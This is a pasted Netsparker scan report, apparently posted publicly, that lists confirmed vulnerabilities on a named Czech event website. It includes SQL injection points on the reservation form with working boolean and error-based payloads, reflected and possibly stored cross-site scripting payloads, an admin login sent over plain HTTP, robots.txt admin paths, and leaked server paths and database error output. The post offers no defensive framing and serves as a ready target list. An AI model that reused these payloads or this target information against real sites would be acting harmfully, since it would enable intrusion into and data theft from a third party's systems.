sroub3k

dsw.cz

Sep 17th, 2011
Title: Data Storage Workshop
URL: http://www.dsw.cz
Scanner: Netsparker
Screen: http://img24.eu/v.php?file=3tyvpmxi.jpg (Vulnerability Chart)

|||

Boolean Based SQL Injection

Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/reserve
Parameter Name: type
Parameter Type: Post
Attack Pattern: -1 OR 17-7=10

|||

[High Possibility] SQL Injection

Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/reserve
Parameter Name: step
Parameter Type: Post
Attack Pattern: NSFTW

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/reserve
Parameter Name: type
Parameter Type: Post
Attack Pattern: %27

|||

SQL Injection

Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/reserve
Parameter Name: type
Parameter Type: Post
Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

|||

Cross-site Scripting

Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/reserve
Parameter Name: type
Parameter Type: Post
Attack Pattern: '><script>alert(9)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/index.php?pg=><body onload=alert(9)>
Parameter Name: pg
Parameter Type: Querystring
Attack Pattern: ><body onload=alert(9)>

|||

[Possible] Permanent Cross-site Scripting

Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/reserve
Injection URL: http://www.dsw.cz/lang.inc.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x0001DB)%3E
Parameter Name: back
Parameter Type: Post
Attack Pattern: %27
-
Error message:
<--
Warning: include(./lang/lang-\'\"><net sparker=netsparker(0x0001DB)>.php) [function.include]: failed to open stream: No such file or directory in /data/www/virtuals/expo-net.cz/www/index.php on line 19

Warning: include() [function.include]: Failed opening './lang/lang-\'\"><net sparker=netsparker(0x0001DB)>.php' for inclusion (include_path='.:/usr/share/php:/usr/share/php5:/data/www/htdocs/PEAR') in /data/www/virtuals/expo-net.cz/www/index.php on line 19
.css" rel="stylesheet" type="text/css" media="all" />
Expo-net.cz
Chyba vyberu z databaze
SQL dotaz:
SELECT cl.nadpis, cl.text, cl.perex, cl.gid, cg.id_menu FROM clanky_global AS cg LEFT JOIN \'\">_clanky AS cl ON cg.gid = cl.gid WHERE cg.identifikator = 'clanek_kalendar_bottom' AND cl.aktivni = 1 AND (cg.alias REGEXP '([[.vertical-line.]]51[[.vertical-line.]]){1}') ORDER BY cg.razeni DESC, cl.ulozeno DESC
Chybova hlaska:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\">_clanky AS cl ON cg.gid = cl.gid ' at line 7
-->

|||

Password Transmitted Over HTTP

Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/admin/index.php
Form target action: index.php

|||

Robots.txt Identified
http://www.dsw.cz/robots.txt

User-Agent: *
Disallow: /admin/
Disallow: /tisk/
Disallow: /foto/
Disallow: /files/
Disallow: /kosik*
Disallow: /index.php?pg=rezervace*
Disallow: /index.php?pg=processdata*

|||

[Possible] Internal Path Leakage (*nix)

Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209

Severity : Information
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.dsw.cz/reserve
Identified Internal Path(s): /usr/share/php:/usr/share/php5:/data/www/htdocs/PEAR
Parameter Name: back
Parameter Type: Post
Attack Pattern: %27

|||